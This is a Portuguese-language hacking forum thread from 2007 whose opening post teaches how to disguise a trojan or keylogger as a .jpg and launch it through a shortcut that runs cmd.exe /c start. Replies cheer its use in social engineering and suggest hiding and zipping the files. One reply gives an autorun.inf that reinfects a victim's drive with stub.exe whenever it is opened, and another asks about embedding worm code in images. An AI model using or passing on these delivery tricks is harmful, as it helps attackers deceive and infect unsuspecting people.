Executar jpg como um exe.

Iniciado por DarkGenesis, 31 de Março , 2007, 09:06:49 AM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

DarkGenesis

Pegue um arquivo exe que vc tem, e difarçe ele com uma extensão jpg ou txt, ou outra qualquer.... Para fazer isso para melhor entendimento, crie uma pasta no seu c:\ e coloque o seu executavel dentro dessa pasta, renomeie o seu executavel para um nome qualquer e com uma extensão que disfarçe bem o seu virus, trojan ou kl....

exemplo:trojan.exe, renomeie para trojan.jpg ou trojan.txt, fazendo com que ele se torne um arquivo de extensão diferente.


Agora é hora de criar um arquivo de comando que irá executar o jpg como se fosse um arquivo executável...

clique com o botão direito em uma area em branco e crie um atalho, como mostra a baixo:


na primeira opção "linha de comando", selecione o arquivo jpg que esta disfaçado.

na segunda opção "digite um nome para o atalho", coloque um nome qualquer com a extensão lnk.

exemplo: arquivo.lnk

dps clique em concluir.

Agora clique com o botão direito do mouse no arquivo.lnk, voce ira ve esta tela a baixo:



Na opção "Destino", coloque esta linha de comando %systemroot%\System32\cmd.exe /c start foto.jpg

Ficando assim:



O cmd irá executar a extensão jpg como se fosse um exe...
Você pode alterar o ícone do arquivo.lnk como vc quiser...

Fonte: Invasao
Autor: Zørrø

#phobia

Nossa... Muito bom velho!

Gostei mesmo, ainda não sabia dessa. Com certeza vai ajudar bastante!


Vlw!!!

anakim

Why use Windows? If I have the door ;-)

whit3_sh4rk

Método interessante.. atualmente a galera está "esperta" e mtos já sabem conhecer um executável.. porém nada que uma SEing não resolva... agora com essa aí de .JPG... Háaa.. vai rolar a festa mesmo rs..

[]s

Mental_Way

Muito boa essa...

Realmente é um método que vem para ajudar e muito em uma boa seing... :D

Sem +...
[RitualistaS GrouP]

"Aquele que sabe pouco rapidamente revela isto."

Anonymous

Nussa muito bom com... Parabéns pelo tuto perfeito.

Zero cool

A desvantagem é ter que enviar os dois arquivos se não o mesmo acredito que não fique funcional mais tá valendo.
Abraço!

#phobia

Citação de: "Zero cool"A desvantagem é ter que enviar os dois arquivos se não o mesmo acredito que não fique funcional mais tá valendo.
Abraço!

É verdade, mas até que não é um grande problema...
Basta colocar o arquivo como oculto e zipar os dois (o oculto e o não oculto) em uma pasta. Daí quando o indivíduo abrir a pasta vai ver só um arquivo...   ;D

Bye!

rog

daria para auto executar o link com um arquivo .inf

esse e um exemple que eu fisse para reinfectar a vitima a cada vez que ele abra o drive D:

conteudo do autorun.inf

[autorun]
icon=stub.exe
open=stub.exe
action=usb stick
label=usb stick
shell\open\command=stub.exe
shell\open=usb stick

usb stick e o label do drive D:

rog
realty.sys is corrupt :  reboot the universe (Y/N)

keyhell

No caminho do atalho %systemroot%\System32\cmd.exe /c start foto.jpg  o "/c" seria a raiz C:\ ??
Pq se vc enviar pra alguem executar os arquivos deveriam estar na raiz.
Estou correto?

Abraços
Prefiro morrer de pé a viver sempre ajoelhado.
(Ernesto "Che" Guevara)

whit3_sh4rk

[keyhell]
Não.. /c é um parâmetro.. e a variável: %systemroot% retorna a pasta onde está instalado o Windows..

Para mais detalhes digite no prompt: cmd /?

E teste: echo %systemroot%..

[]s

Exter


Anonymous

mto boa a dica, vai ser bem util aki pra mim =]

Anonymous

Bom estive pensando, a poucos dias achei um progama no qual vc pode encriptar textos na imagem e ser envia a alguem e essa pessoa com o msm progama pode abrir a imagem e poder ler o texto q foi colocado na msm.. intaum pensando nisso

teria como a gente enserir um codigo WORM , ow algum comando exe dentro da imagem e mandar para alguem p/ que quando essa pessoa abrir a imagem o comando  q foi inserido poder execultar ....

OBS: a imagem irar abrir normal , mais sendo q o texto q no caso um virus ow worm sera acinado apos o click da vitima...


espero retorno

Anonymous

Excelente tecnica, que além de esconder o arquivo, você pode até alterar o icone.  :D

Agora e so usar a cabeça "Engenharia Social" e pronto.